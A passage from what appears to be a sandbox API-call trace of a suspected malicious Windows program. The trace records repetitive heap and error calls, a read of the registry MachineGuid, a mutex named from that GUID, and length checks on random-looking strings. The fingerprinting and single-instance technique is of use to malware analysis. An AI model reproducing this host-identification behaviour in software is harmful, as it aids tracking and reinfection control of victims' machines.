(dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.852] GetLastError () returned 0x0 [0137.852] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.853] SetLastError (dwErrCode=0x0) [0137.853] GetLastError () returned 0x0 [0137.854] SetLastError (dwErrCode=0x0) [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x98) returned 0x2f19f8 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1f) returned 0x2f1a98 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x2f1ac0 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x37) returned 0x2f1b00 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x2f1b40 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x31) returned 0x2f1b88 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1bc8 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1be8 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x14) returned 0x2f1c18 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd) returned 0x2f1c38 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x25) returned 0x2f1c50 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x39) returned 0x2f1c80 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f1cc8 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1ce8 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe) returned 0x2f1d08 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x69) returned 0x2f1d20 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x2f1d98 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1de0 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1d) returned 0x2f1e08 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x2f1e30 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f1e80 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f1ea0 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1ec0 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1ee8 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f1f18 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f1f50 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x41) returned 0x2f1f78 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1fc8 [0137.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xf) returned 0x2f1fe8 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x16) returned 0x2f2000 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x2f2020 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f2058 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x15) returned 0x2f2090 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f20b0 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x2f20d8 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f2110 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f2130 [0137.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x46) returned 0x2f2150 [0137.855] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f11f8 | out: hHeap=0x2f0000) returned 1 [0137.856] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x80) returned 0x2f11f8 [0137.856] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f21a0 [0137.856] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0137.856] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.856] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x46635f) returned 0x4012b5 [0137.857] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.857] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.857] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.858] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.858] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.858] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.859] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.859] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.859] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.859] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.860] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.860] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.860] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.861] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.886] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.886] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.887] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.887] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.887] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.887] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.888] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.888] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.888] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.889] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.889] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.890] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.890] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.890] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.890] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.891] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0137.891] GetLastError () returned 0x0 [0137.891] SetLastError (dwErrCode=0x0) [0137.891] GetLastError () returned 0x0 [0137.891] SetLastError (dwErrCode=0x0) [0137.891] GetLastError () returned 0x0 [0137.891] SetLastError (dwErrCode=0x0) [0137.891] GetLastError () returned 0x0 [0137.891] SetLastError (dwErrCode=0x0) [0137.891] GetLastError () returned 0x0 [0137.892] SetLastError (dwErrCode=0x0) [0137.892] GetLastError () returned 0x0 [0137.892] SetLastError (dwErrCode=0x0) [0137.892] GetLastError () returned 0x0 [0137.892] SetLastError (dwErrCode=0x0) [0137.892] GetLastError () returned 0x0 [0137.892] SetLastError (dwErrCode=0x0) [0137.892] GetLastError () returned 0x0 [0137.892] SetLastError (dwErrCode=0x0) [0137.892] GetLastError () returned 0x0 [0137.892] SetLastError (dwErrCode=0x0) [0137.892] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.893] GetLastError () returned 0x0 [0137.893] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.894] SetLastError (dwErrCode=0x0) [0137.894] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.895] GetLastError () returned 0x0 [0137.895] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.896] SetLastError (dwErrCode=0x0) [0137.896] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.897] SetLastError (dwErrCode=0x0) [0137.897] GetLastError () returned 0x0 [0137.898] SetLastError (dwErrCode=0x0) [0137.898] GetLastError () returned 0x0 [0137.989] GetCurrentHwProfileA (in: lpHwProfileInfo=0x18f294 | out: lpHwProfileInfo=0x18f294) returned 1 [0137.990] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x30) returned 0x2f1280 [0137.990] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f104 | out: phkResult=0x18f104*=0xb0) returned 0x0 [0137.990] RegQueryValueExA (in: hKey=0xb0, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x18f20c, lpcbData=0x18f108*=0xff | out: lpType=0x0, lpData=0x18f20c*=0x30, lpcbData=0x18f108*=0x25) returned 0x0 [0137.990] RegCloseKey (hKey=0xb0) returned 0x0 [0137.990] CharToOemA (in: pSrc="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", pDst=0x18f10c | out: pDst="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 1 [0137.990] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x30) returned 0x2f12b8 [0137.990] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x50) returned 0x2f12f0 [0137.990] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f12b8 | out: hHeap=0x2f0000) returned 1 [0137.990] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f{846ee340-7039-11de-9d20-806e6f6e6963}") returned 0xb0 [0137.990] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f12f0 | out: hHeap=0x2f0000) returned 1 [0137.991] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1280 | out: hHeap=0x2f0000) returned 1 [0137.991] GetLastError () returned 0x0 [0137.991] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x372b28 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0137.991] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x372b40 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0137.991] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x375918 [0137.991] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.991] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0137.992] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3657f0 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.992] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.993] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0137.993] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x375930 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0137.993] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x375948 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] lstrlenA (lpString="22U53309S") returned 9 [0137.993] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x375320 [0137.993] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.993] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.993] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.993] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0137.994] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x375348 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.994] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0137.995] LocalAlloc 